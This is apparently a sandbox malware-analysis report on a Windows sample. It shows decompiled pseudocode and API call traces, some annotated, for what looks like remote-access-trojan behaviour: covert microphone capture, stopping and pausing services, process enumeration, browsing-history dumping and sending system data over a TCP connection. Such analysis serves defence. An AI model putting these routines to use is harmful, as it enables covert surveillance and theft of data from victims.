                                          • Part of subcall function 00401B26: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401B5D
                                          • Part of subcall function 00401B26: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401B75
                                          • Part of subcall function 00401B26: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401B80
                                          • Part of subcall function 00401B26: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /sort "Visit Time" /stext ",?,?,00415628,00000000), ref: 00401B9C
                                          • Part of subcall function 00401B26: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 00401BAE
                                          • Part of subcall function 00401B26: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401BBB
                                          • Part of subcall function 00401B26: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00401BC8
                                          • Part of subcall function 00401B26: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00401BD2
                                          • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BE3
                                          • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BEC
                                          • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BF5
                                          • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BFE
                                          • Part of subcall function 00401B26: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00401C0D
                                          • Part of subcall function 00401B26: Sleep.KERNEL32(000000FA), ref: 00401C24
                                          • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000009D), ref: 00401C35
                                          • Part of subcall function 00401B26: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401C3E
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$??1?$basic_string@$G@std@@$G@2@@std@@$??0?$basic_string@$?c_str@?$basic_string@V01@@$?length@?$basic_string@G@2@@0@Hstd@@V12@V?$basic_string@$??4?$basic_string@?substr@?$basic_string@D@1@@V01@$?find@?$basic_string@FileG@1@@ModuleNameSleepV10@V10@0@V10@@
                                        • String ID:
                                        • API String ID: 573486607-0
                                        • Opcode ID: 0444dc97c48bc4e2f82eff9e350e899fd224b97dfb04b76e2a9bcbee0c6a45e8
                                        • Instruction ID: 745551a8169cf10c7f688d11d93f95233c425957d6d772b9d422287574ec9151
                                        • Opcode Fuzzy Hash: 0444dc97c48bc4e2f82eff9e350e899fd224b97dfb04b76e2a9bcbee0c6a45e8
                                        • Instruction Fuzzy Hash: 2D11A23160060DDBCB04FBA5DD5AAEE3778EB48304F008439F912A72E1EF785544CBA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 51%
                                        			E0040DBD7() {
                                        				char* _t7;
                                        				int _t8;
                                        				char* _t9;
                                        				int _t10;
                                        				char* _t11;
                                        				void* _t33;
                                        				void* _t40;
                                        
                                        				 *0x41b1f8 = 0;
                                        				_t7 = E0040180C(_t33 - 0x10, 0, 2);
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				_t8 = atoi(_t7);
                                        				_t9 = E0040180C(_t33 - 0x10, 0, 1);
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				_t10 = atoi(_t9);
                                        				_t11 = E0040180C(_t33 - 0x10, 0, 0);
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				E004010CE(_t40, atoi(_t11), _t10, _t8); // three decimal fields (indices 0, 1, 2) of the command, parsed with atoi, feed the waveInOpen/waveInStart capture routine
                                        				E004017DD(_t33 - 0x10);
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				return 0;
                                        			}


                                        APIs
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002), ref: 0040DBEB
                                        • atoi.MSVCRT ref: 0040DBF8
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040DC08
                                        • atoi.MSVCRT ref: 0040DC0F
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000), ref: 0040DC1E
                                        • atoi.MSVCRT ref: 0040DC25
                                          • Part of subcall function 004010CE: _ftol.MSVCRT ref: 00401134
                                          • Part of subcall function 004010CE: waveInOpen.WINMM(0041B198,000000FF,0041B218,0040122D,00000000,00030008), ref: 0040115E
                                          • Part of subcall function 004010CE: waveInStart.WINMM ref: 00401177
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@atoi$??1?$basic_string@wave$OpenStart_ftol
                                        • String ID:
                                        • API String ID: 463581448-0
                                        • Opcode ID: e8abcc86fd1f763814c7dcc41e9978dcc5a8fc80e57baa885fa6e4d5f9deb451
                                        • Instruction ID: c3a8f3133f02346e86bcb6311be1634d36dcbe797283f91724418690e0411b93
                                        • Opcode Fuzzy Hash: e8abcc86fd1f763814c7dcc41e9978dcc5a8fc80e57baa885fa6e4d5f9deb451
                                        • Instruction Fuzzy Hash: 1D01FF72E00218DFDB04BBF1EC599ED7764EB90356B00483EE512E71E1EEB85904CB58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 68%
                                         			// Pauses a named Windows service: access mask 0x40 is SERVICE_PAUSE_CONTINUE and
                                         			// control code 2 is SERVICE_CONTROL_PAUSE. Returns 1 if the control was accepted, else 0.
                                         			E00411859(void* _a4) {
                                         				struct _SERVICE_STATUS _v32;
                                         				short* _t6;
                                         				signed int _t14;
                                         				void* _t17;
                                         				void* _t18;
                                         
                                         				_t14 = 0;
                                         				_t6 = OpenSCManagerW(0, 0, 0x40);
                                         				_t18 = _t6;
                                         				// c_str() of a std::wstring holding the service name; the decompiler did not
                                         				// model its return value, so _t6 in the OpenServiceW call is really that pointer
                                         				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                         				_t17 = OpenServiceW(_t18, _t6, 0x40);
                                         				if(_t17 != 0) {
                                         					_t14 = 0 | ControlService(_t17, 2,  &_v32) != 0x00000000;   // 2 = SERVICE_CONTROL_PAUSE
                                         					CloseServiceHandle(_t18);
                                         					CloseServiceHandle(_t17);
                                         				} else {
                                         					CloseServiceHandle(_t18);
                                         				}
                                         				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();   // ~std::wstring
                                         				return _t14;
                                         			}









                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,0041B310,?,?,?,?,?,?,?,004111F9), ref: 00411868
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000040,?,?,?,?,?,?,?,004111F9), ref: 00411875
                                        • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,004111F9), ref: 0041187D
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004111F9), ref: 0041188A
                                        • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,?,004111F9), ref: 00411899
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004111F9), ref: 004118AB
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004111F9), ref: 004118AE
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,004111F9), ref: 004118B3
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                        • String ID:
                                        • API String ID: 858787766-0
                                        • Opcode ID: cb019a389b407e0f39cc257e6cab2f96e1b8a4e5817695bb663befdd35136c94
                                        • Instruction ID: 456a524f7c11b696f934a25de41654fa22df35ab19f263cd8204020f404e56b2
                                        • Opcode Fuzzy Hash: cb019a389b407e0f39cc257e6cab2f96e1b8a4e5817695bb663befdd35136c94
                                        • Instruction Fuzzy Hash: 39F04471510518EFD3107FB4AC89EFF3F6CDF89790B448025FA0692150D7749D468AE9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 68%
                                         			// Resumes a paused service: same shape as E00411859, but control code 3 is
                                         			// SERVICE_CONTROL_CONTINUE (access 0x40 = SERVICE_PAUSE_CONTINUE). Returns 1 on success.
                                         			E004118C0(void* _a4) {
                                         				struct _SERVICE_STATUS _v32;
                                         				short* _t6;
                                         				signed int _t14;
                                         				void* _t17;
                                         				void* _t18;
                                         
                                         				_t14 = 0;
                                         				_t6 = OpenSCManagerW(0, 0, 0x40);
                                         				_t18 = _t6;
                                         				// service name from a std::wstring; its c_str() result is what OpenServiceW receives
                                         				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                         				_t17 = OpenServiceW(_t18, _t6, 0x40);
                                         				if(_t17 != 0) {
                                         					_t14 = 0 | ControlService(_t17, 3,  &_v32) != 0x00000000;   // 3 = SERVICE_CONTROL_CONTINUE
                                         					CloseServiceHandle(_t18);
                                         					CloseServiceHandle(_t17);
                                         				} else {
                                         					CloseServiceHandle(_t18);
                                         				}
                                         				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();   // ~std::wstring
                                         				return _t14;
                                         			}









                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,0041B310,?,?,?,?,?,?,?,00411168), ref: 004118CF
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000040,?,?,?,?,?,?,?,00411168), ref: 004118DC
                                        • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00411168), ref: 004118E4
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411168), ref: 004118F1
                                        • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,?,00411168), ref: 00411900
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411168), ref: 00411912
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411168), ref: 00411915
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00411168), ref: 0041191A
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                        • String ID:
                                        • API String ID: 858787766-0
                                        • Opcode ID: b8c97e63606c52034d353a1b2137b25ccf4b96d28f39b7d99feda07d95563afa
                                        • Instruction ID: 16193dc10f2cd34b32417e23f1564050492aa2af447f1f1bdc9e6cf5e8b33254
                                        • Opcode Fuzzy Hash: b8c97e63606c52034d353a1b2137b25ccf4b96d28f39b7d99feda07d95563afa
                                        • Instruction Fuzzy Hash: D7F04471510518EFD7106FB4EC88DEF3F6CDF89750B444025FA0692150DB749E458AE9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 68%
                                         			// Stops a named service: access mask 0x20 is SERVICE_STOP and control code 1 is
                                                  			// SERVICE_CONTROL_STOP. Returns 1 if the control was accepted, else 0.
                                         			E00411760(void* _a4) {
                                         				struct _SERVICE_STATUS _v32;
                                         				short* _t6;
                                         				signed int _t14;
                                         				void* _t17;
                                         				void* _t18;
                                         
                                         				_t14 = 0;
                                         				_t6 = OpenSCManagerW(0, 0, 0x20);
                                         				_t18 = _t6;
                                         				// service name from a std::wstring; its c_str() result is what OpenServiceW receives
                                         				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                         				_t17 = OpenServiceW(_t18, _t6, 0x20);
                                         				if(_t17 != 0) {
                                         					_t14 = 0 | ControlService(_t17, 1,  &_v32) != 0x00000000;   // 1 = SERVICE_CONTROL_STOP
                                         					CloseServiceHandle(_t18);
                                         					CloseServiceHandle(_t17);
                                         				} else {
                                         					CloseServiceHandle(_t18);
                                         				}
                                         				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();   // ~std::wstring
                                         				return _t14;
                                         			}









                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,0041B310,?,?,?,?,?,?,?,00411280), ref: 0041176F
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000020,?,?,?,?,?,?,?,00411280), ref: 0041177C
                                        • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00411280), ref: 00411784
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411280), ref: 00411791
                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,?,00411280), ref: 004117A0
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411280), ref: 004117B2
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411280), ref: 004117B5
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00411280), ref: 004117BA
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                        • String ID:
                                        • API String ID: 858787766-0
                                        • Opcode ID: f8fd2a6c5f299153eb193c66ec477f5c61babc6e911454b5a8d4cefe462bdfda
                                        • Instruction ID: b89de82e4dcd107d12e5f2e386de490b738cfb46e6195f9b9e1884d6b0831d1c
                                        • Opcode Fuzzy Hash: f8fd2a6c5f299153eb193c66ec477f5c61babc6e911454b5a8d4cefe462bdfda
                                        • Instruction Fuzzy Hash: 23F0AF71100618EFD3106FB4AC88EFF3F6CEF89390B044025FA06921A0DB648D468AE9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 43%
                                         			// Builds a report string from the current PID (decimal, _itoa base 10) and the
                                         			// output of E00409EAA, which per its subcalls walks the process list with
                                         			// CreateToolhelp32Snapshot/Process32FirstW/Process32NextW. The result is handed to
                                         			// E004020C2 with the object at 0x41be70; decompiler quality is low (43%), so the
                                         			// argument lists below are only partially resolved.
                                         			E0040D761(void* __ecx, void* __eflags) {
                                         				void* _t15;
                                         				void* _t20;
                                         				void* _t30;
                                         				void* _t32;
                                         				void* _t34;
                                         				void* _t38;
                                         
                                         				_t38 = __eflags;
                                         				_t20 = __ecx;
                                         				__imp___itoa(GetCurrentProcessId(), _t32 - 0x30, 0xa);   // PID -> "1234" in a stack buffer
                                         				_t15 = _t32 - 0x60;
                                         				L00414140();   // std::string operator+ (string, string), see the ??Hstd refs under APIs
                                         				L00414170();   // std::string operator+ (string, const char*)
                                         				E004020C2(0x41be70, 0x4f, _t34);
                                         				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t15, _t15, E00409EAA(_t38, _t32 - 0x150), _t30, _t32 - 0x30, _t20);
                                         				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                         				E004017DD(_t32 - 0x10);
                                         				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();   // temporaries destroyed
                                         				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                         				return 0;
                                         			}










                                        APIs
                                        • GetCurrentProcessId.KERNEL32(?,0000000A), ref: 0040D767
                                        • _itoa.MSVCRT ref: 0040D76E
                                          • Part of subcall function 00409EAA: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00409EBB
                                          • Part of subcall function 00409EAA: CreateToolhelp32Snapshot.KERNEL32 ref: 00409ECF
                                          • Part of subcall function 00409EAA: Process32FirstW.KERNEL32(00000000,?), ref: 00409EF0
                                          • Part of subcall function 00409EAA: Process32NextW.KERNEL32(00000000,0000022C), ref: 00409EFD
                                          • Part of subcall function 00409EAA: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,00000000,0000022C,00000000,?,00000002,00000000), ref: 00409F1E
                                          • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409F99
                                          • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FA9
                                          • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FB6
                                          • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4), ref: 00409FC6
                                          • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004166F4,00000000), ref: 00409FD3
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?), ref: 0040D78E
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040D798
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004F), ref: 0040D7AF
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E69B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@0@D@2@@std@@Hstd@@V?$basic_string@$??1?$basic_string@$V10@0@$??0?$basic_string@V10@$Process32$CreateCurrentD@1@@FirstG@1@@G@2@@std@@G@std@@NextProcessSnapshotToolhelp32V01@@_itoa
                                        • String ID:
                                        • API String ID: 1707565870-0
                                        • Opcode ID: df7207b37aa3fc83145d442fa6c541f7260c2bf86f695acf5d840247295bf7f5
                                        • Instruction ID: 286f1569ef994b2bf272d8202e8d00d479d3e157814ab9f0be6f7aa08cfd563f
                                        • Opcode Fuzzy Hash: df7207b37aa3fc83145d442fa6c541f7260c2bf86f695acf5d840247295bf7f5
                                        • Instruction Fuzzy Hash: CD01217291021CEBCB05ABE1EC4DDEE7738FBA4306F00443AF506A7091EB745949CB59
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 50%
                                         			// Samples CPU load: GetSystemTimes is resolved at run time via GetProcAddress rather
                                         			// than imported, called twice around a 1000 ms Sleep, and the deltas of the
                                         			// idle/kernel/user FILETIMEs (E004123EE packs one FILETIME into a 64-bit value,
                                         			// high half in edx/_t56) are turned into a percentage with 64-bit helpers
                                         			// (the __aulldiv listed under APIs); 0x64 = 100.
                                         			E0041230A(void* __ecx, intOrPtr __edx, void* __eflags) {
                                         				intOrPtr _v8;
                                         				intOrPtr _v12;
                                         				intOrPtr _v16;
                                         				intOrPtr _v20;
                                         				intOrPtr _v24;
                                         				intOrPtr _v28;
                                         				intOrPtr _v32;
                                         				char _v44;
                                         				char _v52;
                                         				char _v60;
                                         				char _v68;
                                         				char _v76;
                                         				char _v84;
                                         				void* _t39;
                                         				void* _t41;
                                         				void* _t45;
                                         				void* _t50;
                                         				void* _t54;
                                         				intOrPtr _t56;
                                         				intOrPtr* _t59;
                                         
                                         				_t56 = __edx;
                                         				_t54 = __ecx;
                                         				_t59 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetSystemTimes");
                                         				 *_t59( &_v44,  &_v60,  &_v76);   // first sample: idle, kernel, user
                                         				Sleep(0x3e8);                         // 1000 ms
                                         				 *_t59( &_v52,  &_v68,  &_v84);   // second sample
                                         				_v28 = E004123EE(_t54,  &_v44);
                                         				_v24 = _t56;
                                         				_v20 = E004123EE(_t54,  &_v52);
                                         				_v16 = _t56;
                                         				_t39 = E004123EE(_t54,  &_v60);
                                         				_v32 = _t56;
                                         				_t41 = E004123EE(_t54,  &_v68);
                                         				_v12 = E004123EE(_t54,  &_v76);
                                         				asm("sbb edi, [ebp-0x1c]");   // 64-bit subtraction carried through the high halves
                                         				_v8 = _t56;
                                         				_v32 = _t56;
                                         				_t45 = E004123EE(_t54,  &_v84);
                                         				asm("sbb edi, [ebp-0x4]");
                                         				asm("sbb ecx, [ebp-0xc]");
                                         				asm("adc ecx, [ebp-0x1c]");
                                         				asm("adc ecx, [ebp-0x14]");
                                         				// (kernel + user delta) minus idle delta is the busy time; divided by 100 to get one percent unit
                                         				_t50 = E00413F70(_t45 - _v12 - _v20 + _t41 - _t39 + _v28, _t56, 0x64, 0);
                                         				asm("adc edi, [ebp-0x1c]");
                                         				return E00413F00(_t50, _t56, _t45 - _v12 + _t41 - _t39, _t56);
                                         			}
























                                        APIs
                                        • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,0041B320), ref: 0041231D
                                        • GetProcAddress.KERNEL32(00000000), ref: 00412324
                                        • Sleep.KERNEL32(000003E8,?,0041B320), ref: 0041233F
                                        • __aulldiv.LIBCMT ref: 004123E4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AddressHandleModuleProcSleep__aulldiv
                                        • String ID: GetSystemTimes$kernel32.dll
                                        • API String ID: 482274533-1354958348
                                        • Opcode ID: 46a1d328fedf844ba606f0e8673ace6c540685b211b4bcf1c735d680270a1030
                                        • Instruction ID: 24784d85835a85e8dafa53e59313101cf39276f4ebe332ff0eed9d8e085b34e9
                                        • Opcode Fuzzy Hash: 46a1d328fedf844ba606f0e8673ace6c540685b211b4bcf1c735d680270a1030
                                        • Instruction Fuzzy Hash: 9231CD72D0021DABCB10EBF5CD85DEFBBBCAE48714F04412AF515F3245D678A6498BA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 24%
                                         			// Per the subcalls listed under APIs: E00402038 creates a socket (SOCK_STREAM/IPPROTO_TCP),
                                         			// E0040209B connects it, E004113C9 opens the SCM (OpenSCManagerA) and returns a
                                         			// std::wstring that E00412855 narrows to a std::string, the pieces are concatenated with
                                         			// std::string operator+ (L00414140), the result goes to E004020C2 with code 0x34, and
                                         			// E00402118 wraps CreateThread with E00410F04 as its argument. Quality is 24%, so the
                                         			// _t36 frame-pointer uses and some argument lists are unresolved.
                                         			E00410E53(void* __eflags, char _a4) {
                                         				char _v20;
                                         				char _v36;
                                         				char _v52;
                                         				void* _t16;
                                         				char* _t18;
                                         				void* _t19;
                                         				void* _t36;
                                         
                                         				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z();   // std::string operator=
                                         				E00402038(0x41c130);   // socket()
                                         				asm("movsd");          // 16-byte struct copy (four dword moves)
                                         				asm("movsd");
                                         				asm("movsd");
                                         				asm("movsd");
                                         				E0040209B(0x41c130,  &_a4);   // connect()
                                         				_t16 = E00412855(0x41c130,  &_v36, E004113C9( &_v52));   // SCM query -> narrow string
                                         				_t18 =  &_v20;
                                         				L00414140();   // std::string operator+
                                         				L00414140();
                                         				_t19 = E004020C2(0x41c130, 0x34, _t36 - 0x10);
                                         				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t18, _t18,  &_a4, 0x41b310, _t16, 0x41c130);
                                         				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                         				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();   // ~std::wstring
                                         				E00402118(0x41c130, E00410F04);   // CreateThread
                                         				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                         				return _t19;
                                         			}











                                        APIs
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00410E65
                                          • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                          • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                          • Part of subcall function 004113C9: OpenSCManagerA.ADVAPI32(00000000,00000000,00000004), ref: 004113D9
                                          • Part of subcall function 004113C9: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 004113F2
                                          • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                          • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                          • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
